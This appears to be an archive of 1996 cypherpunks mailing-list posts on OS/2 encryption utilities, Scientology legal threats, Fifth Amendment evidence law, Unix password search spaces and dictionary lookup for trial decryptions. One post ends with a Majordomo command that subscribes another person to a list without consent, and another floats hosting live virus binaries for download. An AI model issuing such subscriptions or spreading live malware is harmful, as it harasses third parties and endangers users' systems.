>makes it illegal for email users to have addresses
> that don't include their own names.

[much scary but useful  information deleted]

Well, I love to be an "I told you so."  Back when nearly everybody was 
fawning over the Leahy bill, I (and a few other people, to their credit) was 
telling you about its likely effect on the usage of encrypted remailers. 
 Not surprisingly, my warnings were eventually recognized to be accurate, at 
least potentially so.  Fortunately (I hope?) we were also told that "they" 
(government thugs, etc) would definitely oppose that bill, a claim which if 
true, would guarantee its quick death _IF_ the opposition of 
Internet-friendly people was also present. 

Now we see that if the thugs can't get what they want by Federal 
legislation, they're gonna try to sneak it through by state law.  Hey, it's 
really doubtful that even NATIONAL law can have a prayer of controlling the 
Internet; I really doubt that Georgia is going to succeed at this attempt.  
Most likely it isn't even constitutional, and it certainly isn't compatible 
with the First amendment or the Federal regulation of most communications 
media.

Even so, this shows just how desperate the statists have become to try to 
get a foothold into the regulation of the Internet.  Ignore this at your own 
peril.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 21 Apr 1996 11:34:25 +0800
To: cypherpunks@toad.com
Subject: Re: OS/2 encryption utilities
Message-ID: <v02120d03ad9f2eda1c88@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:26 4/20/96, mirele@xmission.com wrote:
>Due to the fact that I have been threatened by the Church of Scientology
>with legal action if I do not cease and desist posting encheferated
>parodies of their secret scripture (per a letter I received from Cult
>attorneys via Federal Express today) I am in search of OS/2 disk
>encryption programs.

Parodies have been found by the courts over and over again to not infringe
on copyrights. Tell the criminal cult to shove it. They are bluffing.
[IANAL.]

Don't know about OS/2 disk encryption programs, though.


Disclaimer: My opinions are my own, not those of my employer, DigiCash, Inc.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 21 Apr 1996 11:46:03 +0800
To: cypherpunks@toad.com
Subject: Smartcards are coming to the US
Message-ID: <v02120d05ad9f2fef5d94@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Years after smartcards have become ubiquitous in such countries as Pakistan
and Nepal, not to mention Europe, I just saw my first smartcard commercial
ever on US television.

Way to go :-)



Disclaimer: My opinions are my own, not those of my employer, DigiCash, Inc.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 21 Apr 1996 11:38:36 +0800
To: Computer Virus Help Desk <cypherpunks@toad.com
Subject: Re: Bernstein ruling meets the virus law
Message-ID: <v02120d06ad9f30db9509@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:50 4/20/96, Computer Virus Help Desk wrote:

>To the best of our knowledge simply writing Virus Code including it's
>"distribution" is not a crime in the United States.  However, the
>deliberate, malicious upload or infection of another's computer or system is
>a crime in many states.

What about making Virus binaries available for download? Someone I know has
been thinking about putting the famous "Outlaws" CD on the web, to provide
a one-stop place for unrestricted virus information, including source code
and live viruses. Of course the user has to accept an agreement that they
will use the information for research purposes only.


Disclaimer: My opinions are my own, not those of my employer, DigiCash, Inc.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 21 Apr 1996 08:40:22 +0800
To: mirele@xmission.com
Subject: Re: OS/2 encryption utilities
In-Reply-To: <199604202027.OAA28387@xmission.xmission.com>
Message-ID: <Pine.SUN.3.91.960420180636.1115L-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Apr 1996 mirele@xmission.com wrote:

> Due to the fact that I have been threatened by the Church of Scientology
> with legal action if I do not cease and desist posting encheferated
> parodies of their secret scripture (per a letter I received from Cult
> attorneys via Federal Express today) I am in search of OS/2 disk
> encryption programs.

Were I a Co$ attorney, I would use this to bring discovery violations 
if I took you to court.

I'm not saying they would pass muster, but they sure would be annoying.

> 
> If you can help, please respond asap with suggestions.
> 
> Thank you,
> Deana M. Holmes
> 
> mirele@xmission.com
> -----BEGIN GEEK CODE BLOCK-----
> Version:  3.1
> GAT d- s++ a C++ U P L E- W++ N++ o-- K++ w--- O++ PS++ PE-- Y+ PGP+ t 5
> X-- R- tv-- b++ DI++ D++ G e++++ h+ r* x++
> ------END GEEK CODE BLOCK------
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 21 Apr 1996 08:43:13 +0800
To: cypherpunks@toad.com
Subject: Re: TERRORISM PREVENTION ACT--CONFERENCE REPORT was: EFF/Bernstein Press Release
Message-ID: <2.2.32.19960420221948.00cfdef4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:59 PM 4/19/96 -0700, Bill Frantz wrote:

>Real terrorists receive instruction at terrorism schools run by
>organizations like the Iranians, the PLO, and even the US government (CIA,
>Special Forces etc.)  The rate of technology transfer is much greater with
>hands-on teaching than it is with literature in e.g. libraries or the net.

That's because most people are not autodidactic.  You have to teach them in
person and pound their heads in.  Some like Ted K. do OK at self teaching,
however.  In addition, "teachers" can use the net for research and pick up
lots of interesting info.  They always could pick it up, though.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 21 Apr 1996 11:48:05 +0800
To: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Subject: Re: Spaces in passwords
Message-ID: <199604210129.SAA14344@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:32 PM 4/19/96 EDT, Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com wrote:
>>>Of course not. In a normal Unix password, adding spaces to the
>>>password search space increases the search space, so it necessarily
>>>makes the search harder.

>>Depends on the space of ideas that are leading to your passwords.
>>If the reason you're adding spaces is to separate an n-character word
>>from the dictionary from a 7-n character word from the dictionary,
>>this reduces the search space for a cracker considerably.
>>At least pick random punctuation instead.
>
>Huh?  I don't follow your reasoning.
>If you use two random words, the search space for a dictionary attack
>with an N word dictionary is N^2.  That's true whether you include a space
>or leave it out.  

The context is Unix passwords, which are limited to 8 characters,
not arbitrary-length passphrases like PGP uses.  The size of the
dictionary of words you can use to put two of into 8 characters
is fairly small; the natural choice for two words with a space is
a 4-letter word and a 3-letter word, both chosen from English dictionaries,
though 5/2 and 6/1 are also possible.  It's _way_ searchable,
even if you're not attracted to popular phrases like "Exon You" or "Oh Exon!".

If you're length-constrained, the choice of one word limits the maximum
length of the other.  If you take away another character for punctuation
or space, it reduces it even more.  If I were writing this on a Unix box,
I'd check the number of words in the appropriate length categories, but it's
pretty low, and there's probably a lot less entropy in 3-character words than 4.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sun, 21 Apr 1996 12:35:54 +0800
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: E-mail harassment by c2
Message-ID: <2.2.32.19960421013859.006a6538@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:48 PM 4/20/96 -0400, you wrote:
>Dear folks at C2, 
> 
>If people don't ask you to be placed on a mailing list they jolly well
>don't have to follow *your* instructions to get taken off. 
[snip]

I think you're missing what happened.

Someone subscribed the address for the _cypherpunks_ list to the clueless
list.  The "welcome to clueless" message got sent to you via the cypherpunks
list.  Notice the instructions from C2 say:

>If you ever want to remove yourself from this mailing list, 
>you can send mail to "Majordomo@c2.org" with the following command 
>in the body of your email message: 
> 
>unsubscribe clueless cypherpunks@toad.com 

The email address there is the cypherpunks list, not yours.

The reason you received the second email is that majordomo@c2.org (the
address you sent mail to) is not a person -- it's a mail list administering
program.  Your mail had no command that majordomo recognized, so it sent you
the majordomo help file.  That's what it's supposed to do.

You aren't being harassed by anyone.  You aren't on the clueless list.  You
are on the cyperpunks list -- if you want to unsubscribe, send email to
majordomo@toad.com with the words "unsubscribe cypherpunks" (without the
quotes) in the body of your message.


Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 21 Apr 1996 12:27:09 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Dictionary searching code
Message-ID: <199604210149.SAA14482@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:02 PM 4/19/96 -0500, Adam wrote:
>	Does anyone have some code that will search a dictionary, and
>tell me *quickly* if an arbitrary chunk of text is in the dictionary?
>Pre-indexing steps are fine, as is using big chunks of disk for hash
>tables.  The point of course, is to check arbitrary possible plaintext
>that a test decryption produces.

Those who don't remember Unix are condemned to re-invent it :-)
There have been _lots_ of papers done on the topic, and lots of
programs written; there's probably a good chunk of material in Knuth as well.
How quick is "quickly"?  How big is your dictionary?

"grep" is probably not the right model, since you have the opportunity
to pre-sort your dictionary.  "look" does a binary search on sorted text, 
which can be very fast for general applications; you can go faster if
you want to play with indexing and hashes, using lots of programs like dbm.

If you're looking up a bunch of words at a time, you probably win by
looking up an index table before looking in the dictionary itself,
since it'll be in cache or in your program for all but the first look.
If your dictionary is under 1MB, the useful parts of it may stick around
in cache long enough to avoid multiple disk reads, especially if
you're able to pre-sort the words you're searching against as well.
On the other hand, if it's 100MB, and you're using a large machine,
it's worth using maybe 100-1000KB of hash table to speed up lookups.

Somebody mentioned the use of a bitmapped hash-table to get a quick check
on whether an entry is probably there; there was a paper in Usenix's journal
about 5 years ago on this by one of the Bell Labs Research folks,
probably Doug McIlroy or Peter Weinberger, in the context of a spelling
checker.  If the hashes aren't expensive to compute, and you get a 
small percentage of false hits, it's cheap to look them up in the real
dictionary.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 21 Apr 1996 10:44:18 +0800
To: unicorn@schloss.li
Subject: Re: OS/2 encryption utilities
Message-ID: <01I3RZ4OQ1KW8Y4XUR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 20-APR-1996 19:57:53.83

>>From: mirele@xmission.com

>> Due to the fact that I have been threatened by the Church of Scientology
>> with legal action if I do not cease and desist posting encheferated
>> parodies of their secret scripture (per a letter I received from Cult
>> attorneys via Federal Express today) I am in search of OS/2 disk
>> encryption programs.

>Were I a Co$ attorney, I would use this to bring discovery violations 
>if I took you to court.

	How would this work, since they _haven't_ served her with a subpoena?

>I'm not saying they would pass muster, but they sure would be annoying.

	This is the Co$; they'll be annoying (or worse) no matter what.
Admittedly, letting them get more annoying unnecessarily isn't a good idea.
Now, I wouldn't disagree that she should have posted through a nym.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kdf@gigo.com (John Erland)
Date: Sun, 21 Apr 1996 14:02:40 +0800
To: cypherpunks@toad.com
Subject: Mixmaster to DOS Yet?
Message-ID: <aea_9604202019@gigo.com>
MIME-Version: 1.0
Content-Type: text/plain



[Please respond netmail - I do not see this list regularly...thanks!]

Time to ask again:  Has anyone ported Mixmaster to DOS yet?

Thanks for any info.

        JE
--
: Fidonet:  John Erland 1:203/8055.12  .. speaking for only myself.
: Internet: kdf@gigo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Litt <littlitt@MIT.EDU>
Date: Sun, 21 Apr 1996 12:57:49 +0800
To: cypherpunks@toad.com
Subject: Re: On computer face recognition:
In-Reply-To: <199604120630.XAA14255@dns1.noc.best.net>
Message-ID: <199604210013.UAA04209@hazelwood.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



  geeman@best.com writes:
   > Subject: Re: On computer face recognition:
   > Date: Thu, 11 Apr 1996 23:30:49 -0700
   >
   > There was a piece, I _think_ in Scientific American, tho it might
   > have been an AI journal, on face recognition by use of neural
   > nets together with what were called "eigenface" images: These
   > eigenfaces each have specific characteristics, which when
   > combined together can closely approximate a specific face image.
   > The target face was analyzed in terms of closeness-of-match to a
   > small set of eigenfaces, on the order of 5 to 8, I think.
   > Results of course were promising (else why write about it, eh?)
   > if not excellent.

You are thinking of the article in Scientific American about the
Vision and Modeling group at the MIT Media Lab. For face recognition
stuff, check out:

http://www-white.media.mit.edu/vismod/demos/facerec/index.html

Crypto and privacy relevance? Lots, I imagine.

-jon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 21 Apr 1996 10:50:33 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: OS/2 encryption utilities
In-Reply-To: <01I3RZ4OQ1KW8Y4XUR@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.91.960420200558.1115P-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Apr 1996, E. ALLEN SMITH wrote:

> From:	IN%"unicorn@schloss.li"  "Black Unicorn" 20-APR-1996 19:57:53.83
> 
> >>From: mirele@xmission.com
> 

[reasons for desire for encryption deleted.

> 
> >Were I a Co$ attorney, I would use this to bring discovery violations 
> >if I took you to court.
> 
> 	How would this work, since they _haven't_ served her with a subpoena?

I would use it to show the judge that she is obstructing and concealing her 
conduct and motion for all manner of annoying and intrusive discovery 
procedures as well as use it to show malice of intent.  Because I asked 
'nicely' the first time, her conduct is that much more offensive in that 
she merely used my good faith as a delay to more effectively conceal her 
conduct.  It doesn't take much creativity to get really obnoxious.  
Judges get sympathetic to this kind of thing to.  Paint the picture.  
Plaintiff tries to avoid litigation, sends correspondence, but defendant 
forces plaintiff's hand.

This all assumes it ever gets to court, but Co$ is quick to sue.

> 
> >I'm not saying they would pass muster, but they sure would be annoying.
> 
> 	This is the Co$; they'll be annoying (or worse) no matter what.
> Admittedly, letting them get more annoying unnecessarily isn't a good idea.
> Now, I wouldn't disagree that she should have posted through a nym.
> 	-Allen

I'm just pointing out that she just gave them more ammo, and, I might 
add, that it will be sitting on an archive for quite awhile.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sun, 21 Apr 1996 17:50:51 +0800
To: jimbell@pacifier.com
Subject: [Yadda Yadda] Re: OS/2 encryption utilities
In-Reply-To: <m0uAnQG-0008yqC@pacifier.com>
Message-ID: <Yxaex8m9LksY085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <m0uAnQG-0008yqC@pacifier.com>,
jim bell <jimbell@pacifier.com> wrote:
> At 06:08 PM 4/20/96 -0400, Black Unicorn wrote:
> >On Sat, 20 Apr 1996 mirele@xmission.com wrote:
> >
> >> Due to the fact that I have been threatened by the Church of Scientology
> >> with legal action if I do not cease and desist posting encheferated
> >> parodies of their secret scripture (per a letter I received from Cult
> >> attorneys via Federal Express today) I am in search of OS/2 disk
> >> encryption programs.
> >
> >Were I a Co$ attorney, I would use this to bring discovery violations 
> >if I took you to court.
> 
> You know, I've always thought it odd how some people misuse the English 
> language when they speak in their chosen shorthand.  "bring discovery 
> violations"?  How, exactly, does one _BRING_ a "discovery violation"?   
> Like, maybe, bring it in a whellbarrow?!?   Is "bring" a proper word in this 
> context?  Why not stop using that silly shorthand.
> 
> BTW, you seem to have forgotten that this would be an excellent way to deter 
> the kind of "knock and smash" warrant service common amongst government 
> thugs.  Any argument by the cops that "we must break down the door or else 
> they'll erase the data!" is rendered obviously silly if the data is ALREADY 
> encrypted and inaccessible. If anything, it would make the data permanently 
> inaccessible since it would make (arguably) the release of a decrypt key 
> "incriminating" if it were a criminal case. 
> 
> Yet another excellent reason to encrypt the data is that it deters 
> burglaries, where the purpose of the burglary is to get this data illegally. 
>  Given the COS's history, that is a reasonable fear.
> 
> Jim Bell
> 
> jimbell@pacifier.com
> 

subscribe clueless jimbell@pacifier.com

- -- 
Alan Bostick               | They say in online country there is no middle way
mailto:abostick@netcom.com | You'll either be a Usenet man or a thug for the CDA
news:alt.grelb             |    Simon Spero (after Tom Glazer)
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMXmsmuVevBgtmhnpAQG6IAL+LUJpn1C056Hff6wmmwhHVfSWiy1d9PUy
gYtM0IceT8q7xDmRTph4Nfh6Vel+QzjrlPSunpHlmHe/tvPp7asmp3ci1Pkoecp1
w1cvcc0nxs/LsWjJoDxoNmmlUHsug+z5
=rQ+d
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Tue, 23 Apr 1996 01:50:11 +0800
To: "'cypherpunks@toad.com>
Subject: Micro$oft Crypto API
Message-ID: <01BB2F50.52E74D00@king1-06.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


	Has anyone heard anything about the crypto API M$ is working on?
Will it work W/ RSA? and will it support GAK?
	Sorry if this ?? is redundant, I havent' read my mail for a week.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Apr 1996 15:21:03 +0800
To: Jonathon Blake <grafolog@netcom.com>
Subject: Re: 5th protect password?
Message-ID: <m0uAq1k-00091WC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:22 AM 4/21/96 +0000, Jonathon Blake wrote:
>	Jim:
>
>On Sat, 20 Apr 1996, jim bell wrote:
>
>> >   DOE v. United States, 487 U.S. 201; 108 S. Ct. 2341 (1988)
>
>> >   A defendant can be compelled to produce material evidence that
>> >   is incriminating.  Fingerprints, blood samples, voice
>> >   exemplars, handwriting specimens, or other items of physical
>> >   evidence may be extracted from a defendant against his will.
>> 
>> As you might expect, I see a problem (and a pattern!) with even these 
>	
>	The pattern is that you are again ignoring legal realities.

No, I am not "ignoring legal realities."  I am NOTING them, and noting that 
they form a suspicious pattern.  I do not deny that these items are 
currently  demanded regularly in certain cases; what I challenge is the 
appropriateness of that demand by historical and Constitutional standards.  


>> examples.  Notice that with the possible exception of "handwriting 
>> specimens", the examples above all represent pieces of evidence whose 
>
>	Handwriting as a tool used by most people, dates back to
>	Eighteenth Century.  Before that, it was a trade practiced
>	by scribes, and priests. In Europe, outside of the Clergy,
>	illiteracy was the standard, till the begining of the Industrial
>	Revolution.   <<   Remember that John Dee had an incredibly large
>	library of 200 volumes.  >> 

Yikes! You REALLY need to learn to read!  I wasn't referring to handwriting 
itself , or for that matter to graphology ( the study of handwriting; which 
goes back perhaps 2000 years) but in fact the _forensic_ use of graphology.  
The point is that the demanding of handwriting samples is a fairly new 
concept, at least compared with the writing of the Constitution and the 5th 
amendment.  I'm sure a REAL LAWYER (TM) reading this note will cite the 
first known example of a handwriting example being demanded by a court.  
What do you want to bet that it first occurred in this century?

>
>> or so, etc.  I think even graphology (handwriting analysis) for legal 
>> purposes is likewise comparatively recent, although there is no obvious 
>> technological reason which this should have been so.  The last category, 
>
>	Courts have yet to rule that an individual can be forced
>	to provide a sample of their handwriting, if the purpose
>	of obtaining such a script is for a graphological profile.

Which simply means that they have to have more justification than a 
shotgun-approach inquiry.

>	More to the point, courts -- or at least US Courts -- don't
>	accept graphological profiles, as proof of anything.  

If that were the case, there there would be no justification for demanding a 
handwriting sample.  Nevertheless, it is apparently done.   And while a 
handwriting sample, ALONE, may not be "proof" of something, like most 
evidence it is used in conjunction with other evidence to support a conclusion.

In any case, the initial reference to handwriting samples came from the 
Supreme Court, as quoted above, not me.  Pay more attention.  I was using 
the commentary of the SC to show that most if not all of the kinds of 
evidence demanded of defendants were NOT demande until well over a century 
after the 5th amendment was written.


>
>	I suspect you confusing graphology with questioned document
>	examination. 

No, that's a larger issue. Graphology is a tool which can be used, but there 
are plenty of other technologies which are also useful on questioned 
documents.  Paper analysis, ink analysis, electron microscopy, text 
analysis, to name just a few.  That wasn't the point, however.

>       Courts have ruled that a person may be forced
>	to provide a sample of writing, for use in questioned document
>	examination, without violating the fifth amendment. << You ought
>	to read the case law, to see why providing such a sample is
>	not a fifth amendment violation ---- it might help you be a 
>	better armchair lawyer, who spends to much time watching
>	Perry Mason reruns.  >> 

Question:  Let's suppose, for the purposes of argument, the policy was 
diametrically opposite, and no such samples were taken, ostensibly because 
that would be in violation of the 5th amendment.   Please explain the 
arguments you would use to convince everybody that this opinion was in 
error.  Remember, you couldn't cite precedent, because all the precedent 
would come to the opposite conclusion.  You would have to explain to people 
why the precedents were all wrong.

See the problem?  Lawyers are full of "appeal to authority" arguments, which 
is what a precedent really is.  But precedents can be wrong, are wrong, and 
are occasionally changed.  I pointed out (correctly, I think) that since 
well over 100+ years after the writing of the 5th amendment, there has been a 
pattern of allowing prosecutors to demand evidence of a defendant whenever 
that evidence is considered useful to incriminate that defendant.  I pointed 
out that all of the examples listed in the quotation above represented types 
of evidence that would not have been collected in 1783, or for that matter 
1883, or even a few decades after this.  As such, there is a reasonable 
doubt that the people who wrote the constitution actually intended to allow 
this sort of thing. 

After all, the fact that a given technique is, arguably, useful cannot be 
automatically used to justify its "reasonableness."  After all, confessions 
can be useful to the cops, but that does not automatically grant the cops 
the right to beat confessions out of their prisoners, does it?  Clearly not. 
 And remember, there were a number of examples listed, so I think there is a 
suspicious pattern.  Your response does not address this issue. 


>> Anyone who denies this should be required to make a list of the kinds of 
>
>	Questined Document Examination, which you alluded to, was
>	first accepted by courts in the United States, at the turn 
>	of the century.  And it was only after World War One, that 
>	it was accepted in all courts in the US.  

I don't think that challeges anything I've already said.  And you cut off 
the part where I challenged people to show the kinds of evidence regularly 
demanded of a defendant in 1783, which was about when the 5th amendment was 
written.


>        jonathon
>        grafolog@netcom.com
>
>        Owner:     Graphology-L@Bolis-com 

Aha!  Yet another person who benefits from current government policy! 

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 21 Apr 1996 11:50:35 +0800
To: Majordomo@c2.org
Subject: Re: Welcome to clueless
Message-ID: <199604210043.UAA11770@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Since I didn't ask you to put me on the list I see no reason why I should
follow your instructions to be taken off. 
 
--tallpaul 
 
On Apr 20, 1996 08:35:52, 'Majordomo@c2.org' wrote: 
 
 
>From cypherpunks-errors@toad.com Sat Apr 20 11:54 EDT 1996 
>Received: from toad.com (toad.com [140.174.2.1]) by mail.nyc.pipeline.com 

>(8.7.3/8.7.3) with ESMTP id LAA08182; Sat, 20 Apr 1996 11:54:35 -0400
(EDT) 
>Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id IAA10610
for  
>cypherpunks-outgoing; Sat, 20 Apr 1996 08:42:08 -0700 (PDT) 
>Received: from infinity.c2.org (infinity.c2.org [140.174.185.11]) by
toad.com  
>(8.7.5/8.7.3) with ESMTP id IAA10593 for <cypherpunks@toad.com>; Sat, 20
Apr  
>1996 08:42:03 -0700 (PDT) 
>Received: (from daemon@localhost) by infinity.c2.org (8.7.4/8.6.9) 
>	id IAA05505; Sat, 20 Apr 1996 08:35:52 -0700 (PDT) 
>	Community ConneXion: Privacy & Community: <URL:http://www.c2.net> 
>Date: Sat, 20 Apr 1996 08:35:52 -0700 (PDT) 
>Message-Id: <199604201535.IAA05505@infinity.c2.org> 
>To: cypherpunks@toad.com 
>From: Majordomo@c2.org 
>Subject: Welcome to clueless 
>Reply-To: Majordomo@c2.org 
>Sender: owner-cypherpunks@toad.com 
>Precedence: bulk 
>Content-Type: text 
>Content-Length: 392 
> 
>-- 
> 
>Welcome to the clueless mailing list! 
> 
>If you ever want to remove yourself from this mailing list, 
>you can send mail to "Majordomo@c2.org" with the following command 
>in the body of your email message: 
> 
>unsubscribe clueless cypherpunks@toad.com 
> 
>Here's the general information for the list you've 
>subscribed to, in case you don't already have it: 
> 
>#### No info available for clueless. 
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 21 Apr 1996 11:30:40 +0800
To: cypherpunks@toad.com
Subject: E-mail harassment by c2
Message-ID: <199604210048.UAA12205@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear folks at C2, 
 
If people don't ask you to be placed on a mailing list they jolly well
don't have to follow *your* instructions to get taken off. 
 
You can keep me and other people on "clueless" until we do what you want.
But you can neither force other people to do it nor avoid getting a
reputation for e-mail harassment for your "cute" games. 
 
--tallpaul 
 
>From Majordomo-Owner@c2.org Sat Apr 20 20:43 EDT 1996 
Received: from infinity.c2.org (infinity.c2.org [140.174.185.11]) by
mail.nyc.pipeline.com (8.7.3/8.7.3) with ESMTP id UAA12128 for
<tallpaul@pipeline.com>; Sat, 20 Apr 1996 20:43:23 -0400 (EDT) 
Received: (from daemon@localhost) by infinity.c2.org (8.7.4/8.6.9) 
	id RAA11637; Sat, 20 Apr 1996 17:37:24 -0700 (PDT) 
	Community ConneXion: Privacy & Community: <URL:http://www.c2.net> 
Date: Sat, 20 Apr 1996 17:37:24 -0700 (PDT) 
Message-Id: <199604210037.RAA11637@infinity.c2.org> 
To: tallpaul@pipeline.com 
From: Majordomo@c2.org 
Subject: Majordomo results: Re: Welcome to clueless 
Reply-To: Majordomo@c2.org 
Content-Type: text 
Content-Length: 1476 
 
-- 
 
>>>> Since I didn't ask you to put me on the list I see no reason why I
should 
**** Command 'since' not recognized. 
>>>> follow your instructions to be taken off.  
**** Command 'follow' not recognized. 
>>>>   
>>>> --tallpaul  
END OF COMMANDS 
**** Help for Majordomo@c2.org: 
 
This is Brent Chapman's "Majordomo" mailing list manager, version 1.92.  
 
In the description below items contained in []'s are optional. When 
providing the item, do not include the []'s around it. 
 
It understands the following commands: 
 
    subscribe <list> [<address>] 
	Subscribe yourself (or <address> if specified) to the named <list>. 
 
    unsubscribe <list> [<address>] 
	Unsubscribe yourself (or <address> if specified) from the named <list>. 
 
    get <list> <filename> 
        Get a file related to <list>. 
 
    index <list> 
        Return an index of files you can "get" for <list>. 
 
    which [<address>] 
	Find out which lists you (or <address> if specified) are on. 
 
    who <list> 
	Find out who is on the named <list>. 
 
    info <list> 
	Retrieve the general introductory information for the named <list>. 
 
    lists 
	Show the lists served by this Majordomo server. 
 
    help 
	Retrieve this message. 
 
    end 
	Stop processing commands (useful if your mailer adds a signature). 
 
Commands should be sent in the body of an email message to 
"Majordomo@c2.org". 
 
Commands in the "Subject:" line NOT processed. 
 
If you have any questions or problems, please contact 
"Majordomo-Owner@c2.org". 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Sun, 21 Apr 1996 12:03:38 +0800
To: mirele@xmission.com
Subject: Re: OS/2 encryption utilities
In-Reply-To: <199604202027.OAA28387@xmission.xmission.com>
Message-ID: <9604210059.AA1147@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Deana" == mirele  <mirele@xmission.com> writes:

  > ...I am in search of OS/2 disk encryption programs...

So far as I know, there is (so far) no encrypted IFS (e.g. CFS)
available for OS/2.  There are a few decent file encryption utilities,
however, including Blowfish, DES, and Quipu, all available at Hobbes.

The current version of Blowfish (ported by Matthew Spencer) seems
pretty decent: it's fast (about 200 KBytes/s on my DX2) and easy to
use (command line, not WPS). 
	ftp://hobbes.nmsu.edu/os2/archiver/bfish151.zip
This is what I'd suggest.

DES encryption is available in
	ftp://hobbes.nmsu.edu/os2/diskutil/des_os2.zip

and, with a WPS front end, in
	ftp://hobbes.nmsu.edu/os2/wpsutil/pcsec22.zip

I don't know much about Quipu (Michael Mieves), but you can find it at
	ftp://hobbes.nmsu.edu/os2/diskutil/quipu10.zip

-- 
Roger Williams            PGP key available from PGP public keyservers
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Apr 1996 15:20:52 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: OS/2 encryption utilities
Message-ID: <m0uAqM0-000909C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:13 PM 4/20/96 -0400, Black Unicorn wrote:
>On Sat, 20 Apr 1996, jim bell wrote:

>Perhaps Mr. Bell would have been happier if I had said "bring forth a 
